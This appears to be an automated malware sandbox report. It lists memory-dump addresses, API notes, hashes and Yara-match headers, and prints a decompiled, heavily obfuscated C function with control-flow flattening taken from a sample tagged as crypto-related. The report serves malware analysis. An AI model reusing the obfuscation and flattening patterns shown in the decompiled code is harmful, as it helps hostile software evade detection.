                          0x6f23eee6
                          0x6f23ef08
                          0x6f23ef08
                          0x6f23ef0d
                          0x6f23ef10
                          0x6f23ef17
                          0x6f23ef20
                          0x6f23ef22
                          0x6f23ef25
                          0x6f23f00b
                          0x6f23f00b
                          0x6f23ef2b
                          0x6f23ef2b
                          0x6f23ef2e
                          0x6f23ef31
                          0x6f23ef31
                          0x6f23ef33
                          0x6f23ef40
                          0x6f23ef40
                          0x6f23ef42
                          0x6f23ef43
                          0x6f23ef43
                          0x6f23ef4a
                          0x6f23ef54
                          0x6f23ef54
                          0x6f23f013
                          0x6f23f01d
                          0x6f23f023
                          0x6f23f02c
                          0x6f23f02f
                          0x6f23f032
                          0x6f23f035
                          0x6f23f038
                          0x6f23f03b
                          0x6f23f047
                          0x00000000
                          0x6f23eee8
                          0x6f23eef3
                          0x6f23eef9
                          0x6f23eefb
                          0x6f23f1c1
                          0x6f23f1da
                          0x00000000
                          0x6f23ef01
                          0x6f23ef01
                          0x6f23ef03
                          0x00000000
                          0x6f23ef03
                          0x6f23eefb
                          0x6f23eee6
                          0x6f23eebc
                          0x6f23e9ab
                          0x6f23e9b6
                          0x6f23e9bc
                          0x6f23e9be
                          0x6f23f17b
                          0x6f23f194
                          0x6f23f205
                          0x6f23f205
                          0x6f23f207
                          0x6f23f210
                          0x6f23f22c
                          0x6f23e9c4
                          0x6f23e9c4
                          0x6f23e9c6
                          0x00000000
                          0x6f23e9c6
                          0x6f23e9be
                          0x6f23e9a9
                          0x6f23e94f
                          0x6f23e953
                          0x6f23f0a2
                          0x6f23f0a2
                          0x6f23f0a6
                          0x6f23f0ab
                          0x6f23f0ae
                          0x6f23f0b3
                          0x6f23f0b9
                          0x6f23f0c3
                          0x6f23f0cd
                          0x6f23f0d7
                          0x6f23f0f3
                          0x6f23f0f5
                          0x6f23f0f6
                          0x6f23f102
                          0x6f23f104
                          0x6f23f107
                          0x6f23f107
                          0x6f23f107
                          0x6f23f107
                          0x6f23f0ae
                          0x6f23f113
                          0x6f23f115
                          0x6f23f118
                          0x6f23f11b
                          0x6f23f11b
                          0x6f23f11b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f23e953
                          0x6f23e959
                          0x6f23e959
                          0x6f23e959
                          0x6f23f11e
                          0x6f23f124
                          0x6f23f132
                          0x6f23f132

                          APIs
                          • GetProcAddress.KERNEL32(SymFromAddrW), ref: 6F23E9B6
                          • GetCurrentProcess.KERNEL32 ref: 6F23E9CB
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressCurrentProcProcess
                          • String ID: SymFromAddrW$SymFromInlineContextW$SymGetLineFromAddrW64$SymGetLineFromInlineContextW$called `Option::unwrap()` on a `None` value
                          • API String ID: 3217270580-808744031
                          • Opcode ID: de2e02f1d785db201408f56696abe078e177edd6604260d0e161410da8c450ce
                          • Instruction ID: 58f46d9471134a52498de09876b101d9a275bf563b5ca9d820106dd5331ea75b
                          • Opcode Fuzzy Hash: de2e02f1d785db201408f56696abe078e177edd6604260d0e161410da8c450ce
                          • Instruction Fuzzy Hash: F04269B1904B558FE7258F29C880BD3B7F1FF49314F00492ED59A87A90EB75B8898F81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0122A29B, Relevance: 21.8, Strings: 17, Instructions: 560COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 93%
                          			E0122A29B(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				void* _t595;
				void* _t630;
				void* _t632;
				void* _t634;
				void* _t638;
				void* _t647;
				intOrPtr _t659;
				intOrPtr _t660;
				signed int _t667;
				signed int _t668;
				signed int _t669;
				signed int _t670;
				signed int _t671;
				signed int _t672;
				signed int _t673;
				signed int _t674;
				void* _t675;
				void* _t691;
				void* _t714;
				intOrPtr _t731;
				void* _t733;
				void* _t736;
				void* _t737;
				void* _t738;
				void* _t743;

				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0x20);
				_push(__ecx);
				E0121358A(_t595);
				_v20 = 0xf327e8;
				_t738 = _t737 + 0x20;
				asm("stosd");
				_t736 = 0;
				_t660 = 0x1be4ce1;
				asm("stosd");
				_t667 = 0x1c;
				asm("stosd");
				_v128 = 0xb5779c;
				_v128 = _v128 + 0xdde6;
				_v128 = _v128 ^ 0x00b65582;
				_v212 = 0xab8b7;
				_v212 = _v212 << 5;
				_v212 = _v212 + 0x285b;
				_v212 = _v212 ^ 0x01573f3b;
				_v108 = 0xf1b95;
				_v108 = _v108 << 1;
				_v108 = _v108 ^ 0x001e372a;
				_v236 = 0xd3c766;
				_v236 = _v236 ^ 0x4c35dda4;
				_v236 = _v236 ^ 0xf4ac62e6;
				_v236 = _v236 + 0xac1a;
				_v236 = _v236 ^ 0xb84b243e;
				_v264 = 0x4c8acc;
				_v264 = _v264 | 0x6b972bec;
				_v264 = _v264 * 0x11;
				_v264 = _v264 | 0x4439188c;
				_v264 = _v264 ^ 0x6dfb7aac;
				_v272 = 0x7452f1;
				_v272 = _v272 | 0xadfdffff;
				_v272 = _v272 << 4;
				_v272 = _v272 ^ 0xdfdffff0;
				_v256 = 0xc9874e;
				_v256 = _v256 ^ 0xb0d5c9db;
				_v256 = _v256 ^ 0x60dd3951;
				_v256 = _v256 / _t667;
				_v256 = _v256 ^ 0x07749fb4;
				_v196 = 0x14df4d;
				_v196 = _v196 >> 0xf;
				_v196 = _v196 * 0x62;
				_v196 = _v196 ^ 0x00000fb2;
				_v124 = 0x1fc85;
				_v124 = _v124 + 0xffff9683;
				_v124 = _v124 ^ 0x00019308;
				_v148 = 0xf728c3;
				_v148 = _v148 ^ 0x410bb6ca;
				_v148 = _v148 << 8;
				_v148 = _v148 ^ 0xfc9e0900;
				_v80 = 0xcdef16;
				_v80 = _v80 * 0x69;
				_v80 = _v80 ^ 0x54771006;
				_v64 = 0xcfcda1;
				_v64 = _v64 ^ 0x1349c91b;
				_v64 = _v64 ^ 0x138604ba;
				_v284 = 0x1cf0f9;
				_v284 = _v284 ^ 0x257fade6;
				_v284 = _v284 | 0x51678028;
				_t668 = 0x61;
				_v284 = _v284 / _t668;
				_v284 = _v284 ^ 0x013e0a7b;
				_v84 = 0xee9046;
				_v84 = _v84 + 0xb1b5;
				_v84 = _v84 ^ 0x00eb8e5c;
				_v260 = 0x4d980b;
				_v260 = _v260 << 0xa;
				_v260 = _v260 >> 1;
				_v260 = _v260 | 0xa6abb1dd;
				_v260 = _v260 ^ 0xbfb20ec1;
				_v48 = 0x20a9bf;
				_v48 = _v48 | 0x0eca1706;
				_v48 = _v48 ^ 0x0ee5895d;
				_v224 = 0x8ed0c5;
				_v224 = _v224 + 0xffff1116;
				_v224 = _v224 + 0xe7c9;
				_v224 = _v224 ^ 0x0086e7c0;
				_v184 = 0x1f6a81;
				_v184 = _v184 + 0xffffdf2c;
				_v184 = _v184 | 0xaf0f166a;
				_v184 = _v184 ^ 0xaf1d3044;
				_v244 = 0xe53cb3;
				_v244 = _v244 >> 1;
				_v244 = _v244 + 0xffff7d9e;
				_v244 = _v244 | 0xc5e9b062;
				_v244 = _v244 ^ 0xc5f7f4ed;
				_v220 = 0x94efff;
				_v220 = _v220 + 0xfffff1fc;
				_v220 = _v220 >> 8;
				_v220 = _v220 ^ 0x000e7487;
				_v132 = 0xfeceee;
				_v132 = _v132 << 0x10;
				_v132 = _v132 ^ 0xcee5fb97;
				_v252 = 0x7f7476;
				_v252 = _v252 + 0xffffb7fa;
				_v252 = _v252 + 0xffffd497;
				_t669 = 0x3b;
				_v252 = _v252 / _t669;
				_v252 = _v252 ^ 0x000bee5d;
				_v228 = 0x86e191;
				_v228 = _v228 ^ 0x47ba048e;
				_t670 = 0x46;
				_v228 = _v228 * 0x61;
				_v228 = _v228 ^ 0xfe16436a;
				_v276 = 0x9f0763;
				_v276 = _v276 * 0x61;
				_v276 = _v276 >> 2;
				_v276 = _v276 >> 1;
				_v276 = _v276 ^ 0x078e7242;
				_v204 = 0x7ace55;
				_v204 = _v204 | 0x549f47c2;
				_v204 = _v204 + 0x3ce1;
				_v204 = _v204 ^ 0x55057257;
				_v112 = 0x668a76;
				_v112 = _v112 ^ 0xa303abbe;
				_v112 = _v112 ^ 0xa369580c;
				_v304 = 0xea9dc2;
				_v304 = _v304 | 0x61facf16;
				_v304 = _v304 >> 9;
				_v304 = _v304 << 9;
				_v304 = _v304 ^ 0x61fdd091;
				_v312 = 0x8bf4e;
				_v312 = _v312 + 0x76f7;
				_v312 = _v312 / _t670;
				_v312 = _v312 >> 4;
				_v312 = _v312 ^ 0x0009727a;
				_v120 = 0x784345;
				_v120 = _v120 << 0xe;
				_v120 = _v120 ^ 0x10d533d6;
				_v144 = 0xc8ca07;
				_v144 = _v144 << 0xd;
				_v144 = _v144 ^ 0x194ee9c4;
				_v68 = 0x367751;
				_v68 = _v68 << 0x10;
				_v68 = _v68 ^ 0x775c05ef;
				_v208 = 0xe91d48;
				_t671 = 0x7b;
				_v208 = _v208 / _t671;
				_v208 = _v208 ^ 0xbf924638;
				_v208 = _v208 ^ 0xbf9514f1;
				_v300 = 0xb4f1a1;
				_v300 = _v300 + 0xed19;
				_v300 = _v300 + 0xcea7;
				_v300 = _v300 + 0xffffe1f1;
				_v300 = _v300 ^ 0x00bf2b0f;
				_v100 = 0xb064ad;
				_v100 = _v100 + 0x9df9;
				_v100 = _v100 ^ 0x00b08fdc;
				_v168 = 0xbb40c5;
				_v168 = _v168 ^ 0xb00c62cf;
				_v168 = _v168 | 0xf2e647c5;
				_v168 = _v168 ^ 0xf2fdbde9;
				_v52 = 0x295953;
				_t273 =  &_v52; // 0x295953
				_t672 = 0x30;
				_v52 =  *_t273 * 7;
				_v52 = _v52 ^ 0x0126faa9;
				_v200 = 0x2413c;
				_v200 = _v200 + 0x8dfd;
				_v200 = _v200 ^ 0x3e6fa0dc;
				_v200 = _v200 ^ 0x3e61213f;
				_v268 = 0xbf579f;
				_v268 = _v268 | 0x94a3124e;
				_v268 = _v268 + 0x5b36;
				_v268 = _v268 ^ 0x910745d1;
				_v268 = _v268 ^ 0x05bc7083;
				_v152 = 0x55d14e;
				_v152 = _v152 + 0x80df;
				_v152 = _v152 >> 0xa;
				_v152 = _v152 ^ 0x00052a90;
				_v92 = 0x1560b9;
				_v92 = _v92 / _t672;
				_v92 = _v92 ^ 0x0005217c;
				_v60 = 0xbebd72;
				_t673 = 0x39;
				_v60 = _v60 * 0x71;
				_v60 = _v60 ^ 0x543d4f6d;
				_v192 = 0x306d18;
				_v192 = _v192 >> 1;
				_v192 = _v192 | 0xe6a9074b;
				_v192 = _v192 ^ 0xe6befa7f;
				_v96 = 0x3b01c7;
				_v96 = _v96 / _t673;
				_v96 = _v96 ^ 0x000f61bf;
				_v104 = 0x4d95b3;
				_v104 = _v104 + 0xabeb;
				_v104 = _v104 ^ 0x0046ffda;
				_v296 = 0x26e6f2;
				_v296 = _v296 + 0xc249;
				_v296 = _v296 * 0x61;
				_v296 = _v296 ^ 0x81098a9a;
				_v296 = _v296 ^ 0x8e08e7bd;
				_v188 = 0xd71c43;
				_v188 = _v188 << 0x10;
				_v188 = _v188 ^ 0x4cd6b411;
				_v188 = _v188 ^ 0x509ea514;
				_v88 = 0x9df4f3;
				_v88 = _v88 ^ 0xfb4fb186;
				_v88 = _v88 ^ 0xfbd91614;
				_v172 = 0x58d00f;
				_v172 = _v172 | 0xc5f9e837;
				_v172 = _v172 ^ 0x5c8ab005;
				_v172 = _v172 ^ 0x997bd2d4;
				_v180 = 0xaa9a47;
				_v180 = _v180 << 9;
				_v180 = _v180 << 0xe;
				_v180 = _v180 ^ 0x238e5e5d;
				_v280 = 0x8d05db;
				_v280 = _v280 << 0xb;
				_v280 = _v280 + 0x5af;
				_v280 = _v280 + 0x63a8;
				_v280 = _v280 ^ 0x68295cf1;
				_v288 = 0xc61b9a;
				_t674 = 0x7a;
				_v288 = _v288 / _t674;
				_v288 = _v288 + 0xffff8031;
				_v288 = _v288 | 0xf82c92ce;
				_v288 = _v288 ^ 0xf823c4f7;
				_v76 = 0x7d7f8f;
				_v76 = _v76 << 0xe;
				_v76 = _v76 ^ 0x5fe891b7;
				_v160 = 0xbc8050;
				_v160 = _v160 + 0x6daa;
				_v160 = _v160 * 0x15;
				_v160 = _v160 ^ 0x0f73a105;
				_v308 = 0xc96668;
				_v308 = _v308 + 0x414a;
				_t407 =  &_v308; // 0x414a
				_v308 =  *_t407 * 0x62;
				_v308 = _v308 + 0xe27c;
				_v308 = _v308 ^ 0x4d36216e;
				_v56 = 0x115110;
				_v56 = _v56 * 0x67;
				_v56 = _v56 ^ 0x06f5f102;
				_v156 = 0xc6e7c6;
				_v156 = _v156 * 0x64;
				_v156 = _v156 >> 0xc;
				_v156 = _v156 ^ 0x000d25a7;
				_v164 = 0x17bdd1;
				_v164 = _v164 << 0xa;
				_v164 = _v164 * 0x76;
				_v164 = _v164 ^ 0xc5fde6f3;
				_v240 = 0xf47398;
				_v240 = _v240 >> 6;
				_v240 = _v240 >> 7;
				_v240 = _v240 >> 3;
				_v240 = _v240 ^ 0x00097778;
				_v248 = 0x1b60d8;
				_v248 = _v248 + 0xf00;
				_v248 = _v248 + 0x3d77;
				_v248 = _v248 ^ 0x81e9103a;
				_v248 = _v248 ^ 0x81f628a4;
				_v176 = 0x50729b;
				_v176 = _v176 >> 3;
				_v176 = _v176 | 0x9604386a;
				_v176 = _v176 ^ 0x960292a9;
				_v116 = 0x187061;
				_v116 = _v116 ^ 0x97622a2d;
				_v116 = _v116 ^ 0x97781ca0;
				_v216 = 0xc9b92d;
				_v216 = _v216 + 0xffff432d;
				_v216 = _v216 | 0x73928a81;
				_v216 = _v216 ^ 0x73d91b9b;
				_v136 = 0x5180ac;
				_v136 = _v136 << 8;
				_v136 = _v136 ^ 0x51850075;
				_v44 = 0x8c0327;
				_t733 = 0x8febea2;
				_v44 = _v44 | 0x794e6ffc;
				_t731 = 0xbbe46d3;
				_v44 = _v44 ^ 0x79c48895;
				_v292 = 0xd0b1c9;
				_v292 = _v292 << 0xf;
				_v292 = _v292 | 0x58c18d84;
				_v292 = _v292 >> 7;
				_v292 = _v292 ^ 0x00be930b;
				_v232 = 0x516242;
				_v232 = _v232 | 0x29e88573;
				_v232 = _v232 >> 6;
				_v232 = _v232 + 0xffffe7aa;
				_v232 = _v232 ^ 0x00a5bc0d;
				_v72 = 0x865533;
				_v72 = _v72 * 0x73;
				_v72 = _v72 ^ 0x3c5ef902;
				_v140 = 0x5c125c;
				_v140 = _v140 ^ 0x5dcea434;
				_v140 = _v140 + 0xffff1551;
				_v140 = _v140 ^ 0x5d90ddd5;
				while(1) {
					L1:
					while(1) {
						L2:
						_t675 = 0x960bc8a;
						while(1) {
							L3:
							_t714 = 0xdaaa01c;
							do {
								while(1) {
									L4:
									_t743 = _t660 - 0x6ae200e;
									if(_t743 > 0) {
										break;
									}
									if(_t743 == 0) {
										_push(_v260);
										_push(_v84);
										_t638 = E0122CD35(0x1211330, _v284, __eflags);
										_push(_v184);
										_push(_v224);
										__eflags = E0122D96C(_v244, _v220,  &_v36, _v128, _v132, E0122CD35(0x1211250, _v48, __eflags), _t638) - _v212;
										_t660 =  ==  ? 0x34f6d36 : 0x60ed50;
										E0122629F(_v252, _t638, _v228, _v276, _v204);
										E0122629F(_v112, _t639, _v304, _v312, _v120);
										_t738 = _t738 + 0x3c;
										_t731 = 0xbbe46d3;
										goto L14;
									} else {
										if(_t660 == 0x350b35) {
											E0121AE43(_v32, _v44, _v292);
											_t660 = _t731;
											goto L1;
										} else {
											if(_t660 == 0x1be4ce1) {
												_t660 = 0x6ae200e;
												continue;
											} else {
												if(_t660 == 0x34f6d36) {
													_push(_v208);
													_push(_v68);
													_t647 = E0122CD35(0x1211300, _v144, __eflags);
													_pop(_t691);
													__eflags = E0121EC68( &_v28,  &_v24, _v36, _v300, _t647, _v100, _v168, _t691, _v52, _v200, _v268, _v108) - _v236;
													_t660 =  ==  ? 0xdaaa01c : _t731;
													__eflags = _t660;
													E0122629F(_v152, _t647, _v92, _v60, _v192);
													_t738 = _t738 + 0x34;
													L14:
													_t733 = 0x8febea2;
													L25:
													_t632 = 0x3fd2798;
													_t675 = 0x960bc8a;
													_t714 = 0xdaaa01c;
													goto L26;
												} else {
													if(_t660 == 0x363900b) {
														E0122647C(_v40, _v176, _v116, _v216, _v136);
														_t738 = _t738 + 0xc;
														_t660 = 0x350b35;
														while(1) {
															L1:
															goto L2;
														}
													} else {
														if(_t660 != _t632) {
															goto L26;
														} else {
															E0121BCB2(_a24, _v76, _v160, _v196, _v308, _v56, _a4, _v40);
															_t738 = _t738 + 0x18;
															_t660 =  ==  ? _t733 : 0x363900b;
															while(1) {
																L1:
																L2:
																_t675 = 0x960bc8a;
																L3:
																_t714 = 0xdaaa01c;
																goto L4;
															}
														}
													}
												}
											}
										}
									}
									L29:
									return _t736;
								}
								__eflags = _t660 - _t733;
								if(_t660 == _t733) {
									_t630 = E01232E29(_a8, _v148, _v156, 0x20, _v164, _v40, _v240, _v248);
									_t738 = _t738 + 0x18;
									_t660 = 0x363900b;
									__eflags = _t630 - _v80;
									_t736 =  ==  ? 1 : _t736;
									goto L25;
								} else {
									__eflags = _t660 - _t675;
									if(_t660 == _t675) {
										_t634 = E0122585A(_v264, _t714, _v32, _v36, _v88, _v172, _v180, _v272, _v280,  &_v40, _v28, _v288);
										_t738 = _t738 + 0x28;
										__eflags = _t634 - _v256;
										_t632 = 0x3fd2798;
										_t660 =  ==  ? 0x3fd2798 : 0x350b35;
										goto L2;
									} else {
										__eflags = _t660 - _t731;
										if(_t660 == _t731) {
											E01224827(_v36, _v232, _v64, _v72, _v140);
										} else {
											__eflags = _t660 - _t714;
											if(_t660 != _t714) {
												goto L26;
											} else {
												_push(_t675);
												_push(_t675);
												_t659 = E01225212(_v28);
												_t738 = _t738 + 0xc;
												_v32 = _t659;
												__eflags = _t659;
												_t675 = 0x960bc8a;
												_t632 = 0x3fd2798;
												_t660 =  !=  ? 0x960bc8a : _t731;
												goto L3;
											}
										}
									}
								}
								goto L29;
								L26:
								__eflags = _t660 - 0x60ed50;
							} while (__eflags != 0);
							goto L29;
						}
					}
				}
			}







































































































                          0x0122a2a5
                          0x0122a2ac
                          0x0122a2b3
                          0x0122a2ba
                          0x0122a2c1
                          0x0122a2c8
                          0x0122a2cf
                          0x0122a2d1
                          0x0122a2d2
                          0x0122a2d7
                          0x0122a2eb
                          0x0122a2ee
                          0x0122a2f1
                          0x0122a2f3
                          0x0122a2fa
                          0x0122a2fb
                          0x0122a2fc
                          0x0122a2fd
                          0x0122a308
                          0x0122a313
                          0x0122a31e
                          0x0122a326
                          0x0122a32b
                          0x0122a333
                          0x0122a33b
                          0x0122a346
                          0x0122a34d
                          0x0122a358
                          0x0122a360
                          0x0122a368
                          0x0122a370
                          0x0122a378
                          0x0122a380
                          0x0122a388
                          0x0122a395
                          0x0122a399
                          0x0122a3a1
                          0x0122a3a9
                          0x0122a3b1
                          0x0122a3b9
                          0x0122a3be
                          0x0122a3c6
                          0x0122a3ce
                          0x0122a3d6
                          0x0122a3e4
                          0x0122a3e8
                          0x0122a3f0
                          0x0122a3fb
                          0x0122a40b
                          0x0122a412
                          0x0122a41d
                          0x0122a428
                          0x0122a433
                          0x0122a43e
                          0x0122a449
                          0x0122a454
                          0x0122a45c
                          0x0122a467
                          0x0122a47a
                          0x0122a481
                          0x0122a48c
                          0x0122a497
                          0x0122a4a2
                          0x0122a4ad
                          0x0122a4b5
                          0x0122a4bd
                          0x0122a4cd
                          0x0122a4d2
                          0x0122a4d8
                          0x0122a4e0
                          0x0122a4eb
                          0x0122a4f6
                          0x0122a501
                          0x0122a509
                          0x0122a50e
                          0x0122a512
                          0x0122a51a
                          0x0122a522
                          0x0122a52d
                          0x0122a538
                          0x0122a543
                          0x0122a54b
                          0x0122a553
                          0x0122a55b
                          0x0122a563
                          0x0122a56e
                          0x0122a579
                          0x0122a584
                          0x0122a58f
                          0x0122a597
                          0x0122a59b
                          0x0122a5a3
                          0x0122a5ab
                          0x0122a5b3
                          0x0122a5bb
                          0x0122a5c3
                          0x0122a5c8
                          0x0122a5d0
                          0x0122a5db
                          0x0122a5e3
                          0x0122a5ee
                          0x0122a5f6
                          0x0122a5fe
                          0x0122a60a
                          0x0122a60f
                          0x0122a615
                          0x0122a61d
                          0x0122a625
                          0x0122a632
                          0x0122a633
                          0x0122a637
                          0x0122a63f
                          0x0122a64c
                          0x0122a650
                          0x0122a655
                          0x0122a659
                          0x0122a661
                          0x0122a66c
                          0x0122a677
                          0x0122a682
                          0x0122a68d
                          0x0122a698
                          0x0122a6a3
                          0x0122a6ae
                          0x0122a6b6
                          0x0122a6be
                          0x0122a6c3
                          0x0122a6c8
                          0x0122a6d0
                          0x0122a6d8
                          0x0122a6e6
                          0x0122a6ea
                          0x0122a6ef
                          0x0122a6f7
                          0x0122a702
                          0x0122a70a
                          0x0122a717
                          0x0122a722
                          0x0122a738
                          0x0122a743
                          0x0122a74e
                          0x0122a756
                          0x0122a761
                          0x0122a76f
                          0x0122a774
                          0x0122a77d
                          0x0122a788
                          0x0122a793
                          0x0122a79b
                          0x0122a7a3
                          0x0122a7ab
                          0x0122a7b3
                          0x0122a7bb
                          0x0122a7c6
                          0x0122a7d1
                          0x0122a7dc
                          0x0122a7e7
                          0x0122a7f2
                          0x0122a7fd
                          0x0122a808
                          0x0122a813
                          0x0122a81b
                          0x0122a81e
                          0x0122a825
                          0x0122a830
                          0x0122a83b
                          0x0122a846
                          0x0122a851
                          0x0122a85c
                          0x0122a864
                          0x0122a86c
                          0x0122a874
                          0x0122a87c
                          0x0122a884
                          0x0122a88f
                          0x0122a89a
                          0x0122a8a2
                          0x0122a8ad
                          0x0122a8c3
                          0x0122a8ca
                          0x0122a8d5
                          0x0122a8e8
                          0x0122a8e9
                          0x0122a8f0
                          0x0122a8fb
                          0x0122a906
                          0x0122a90d
                          0x0122a918
                          0x0122a923
                          0x0122a937
                          0x0122a93e
                          0x0122a949
                          0x0122a954
                          0x0122a95f
                          0x0122a96a
                          0x0122a972
                          0x0122a97f
                          0x0122a983
                          0x0122a98b
                          0x0122a993
                          0x0122a99e
                          0x0122a9a8
                          0x0122a9b3
                          0x0122a9be
                          0x0122a9c9
                          0x0122a9d4
                          0x0122a9df
                          0x0122a9ea
                          0x0122a9f5
                          0x0122aa00
                          0x0122aa0b
                          0x0122aa16
                          0x0122aa1e
                          0x0122aa26
                          0x0122aa31
                          0x0122aa39
                          0x0122aa3e
                          0x0122aa46
                          0x0122aa4e
                          0x0122aa56
                          0x0122aa64
                          0x0122aa67
                          0x0122aa6b
                          0x0122aa73
                          0x0122aa7b
                          0x0122aa83
                          0x0122aa8e
                          0x0122aa96
                          0x0122aaa1
                          0x0122aaac
                          0x0122aabf
                          0x0122aac6
                          0x0122aad1
                          0x0122aad9
                          0x0122aae1
                          0x0122aae6
                          0x0122aaea
                          0x0122aaf2
                          0x0122aafa
                          0x0122ab0d
                          0x0122ab14
                          0x0122ab1f
                          0x0122ab32
                          0x0122ab39
                          0x0122ab41
                          0x0122ab4c
                          0x0122ab57
                          0x0122ab67
                          0x0122ab6e
                          0x0122ab79
                          0x0122ab81
                          0x0122ab86
                          0x0122ab8b
                          0x0122ab90
                          0x0122ab98
                          0x0122aba0
                          0x0122aba8
                          0x0122abb0
                          0x0122abb8
                          0x0122abc0
                          0x0122abcb
                          0x0122abd3
                          0x0122abde
                          0x0122abe9
                          0x0122abf4
                          0x0122abff
                          0x0122ac0a
                          0x0122ac12
                          0x0122ac1a
                          0x0122ac22
                          0x0122ac2a
                          0x0122ac35
                          0x0122ac3d
                          0x0122ac48
                          0x0122ac53
                          0x0122ac58
                          0x0122ac63
                          0x0122ac68
                          0x0122ac73
                          0x0122ac7b
                          0x0122ac80
                          0x0122ac88
                          0x0122ac8d
                          0x0122ac95
                          0x0122ac9d
                          0x0122aca5
                          0x0122acaa
                          0x0122acb2
                          0x0122acba
                          0x0122accd
                          0x0122acd4
                          0x0122acdf
                          0x0122acea
                          0x0122acf5
                          0x0122ad00
                          0x0122ad0b
                          0x0122ad0b
                          0x0122ad10
                          0x0122ad10
                          0x0122ad10
                          0x0122ad15
                          0x0122ad15
                          0x0122ad15
                          0x0122ad1a
                          0x0122ad1a
                          0x0122ad1a
                          0x0122ad1a
                          0x0122ad20
                          0x00000000
                          0x00000000
                          0x0122ad26
                          0x0122aebc
                          0x0122aec5
                          0x0122aed0
                          0x0122aed5
                          0x0122aee3
                          0x0122af2b
                          0x0122af3b
                          0x0122af4a
                          0x0122af6a
                          0x0122af6f
                          0x0122af72
                          0x00000000
                          0x0122ad2c
                          0x0122ad32
                          0x0122aeaf
                          0x0122aeb5
                          0x00000000
                          0x0122ad38
                          0x0122ad3e
                          0x0122ae93
                          0x00000000
                          0x0122ad44
                          0x0122ad4a
                          0x0122ade7
                          0x0122adf0
                          0x0122adfe
                          0x0122ae04
                          0x0122ae62
                          0x0122ae70
                          0x0122ae70
                          0x0122ae81
                          0x0122ae86
                          0x0122ae89
                          0x0122ae89
                          0x0122b08e
                          0x0122b08e
                          0x0122b093
                          0x0122b098
                          0x00000000
                          0x0122ad50
                          0x0122ad56
                          0x0122add5
                          0x0122adda
                          0x0122addd
                          0x0122ad0b
                          0x0122ad0b
                          0x00000000
                          0x0122ad0b
                          0x0122ad58
                          0x0122ad5a
                          0x00000000
                          0x0122ad60
                          0x0122ad95
                          0x0122ad9c
                          0x0122adad
                          0x0122ad0b
                          0x0122ad0b
                          0x0122ad10
                          0x0122ad10
                          0x0122ad15
                          0x0122ad15
                          0x00000000
                          0x0122ad15
                          0x0122ad0b
                          0x0122ad5a
                          0x0122ad56
                          0x0122ad4a
                          0x0122ad3e
                          0x0122ad32
                          0x0122b0d5
                          0x0122b0df
                          0x0122b0df
                          0x0122af7c
                          0x0122af7e
                          0x0122b070
                          0x0122b081
                          0x0122b084
                          0x0122b089
                          0x0122b08b
                          0x00000000
                          0x0122af84
                          0x0122af84
                          0x0122af86
                          0x0122b021
                          0x0122b028
                          0x0122b034
                          0x0122b036
                          0x0122b03b
                          0x00000000
                          0x0122af88
                          0x0122af88
                          0x0122af8a
                          0x0122b0cb
                          0x0122af90
                          0x0122af90
                          0x0122af92
                          0x00000000
                          0x0122af98
                          0x0122afb1
                          0x0122afb2
                          0x0122afba
                          0x0122afbf
                          0x0122afc2
                          0x0122afc9
                          0x0122afcd
                          0x0122afd2
                          0x0122afd7
                          0x00000000
                          0x0122afd7
                          0x0122af92
                          0x0122af8a
                          0x0122af86
                          0x00000000
                          0x0122b09d
                          0x0122b09d
                          0x0122b09d
                          0x00000000
                          0x0122b0a9
                          0x0122ad15
                          0x0122ad10

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 6[$?!a>$BbQ$ECx$JAzr$P`$P`$Qw6$SY)$[($mO=T$u$w=$xw$zr$zr$<
                          • API String ID: 0-1031985829
                          • Opcode ID: 7405c3dcad46fb470fcf791bb5d9db96da23f6cc5309d432905bac130392715c
                          • Instruction ID: e935e4294c5883f0d2762ea234bb2e165b81ddabb30bb10b40b917bf44c2d9a8
                          • Opcode Fuzzy Hash: 7405c3dcad46fb470fcf791bb5d9db96da23f6cc5309d432905bac130392715c
                          • Instruction Fuzzy Hash: F2620E711083819FD3B9CF61C58AB9FBBE2BBD4704F10891DE29A96260D7B18949CF43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01230370, Relevance: 19.4, Strings: 15, Instructions: 644COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 94%
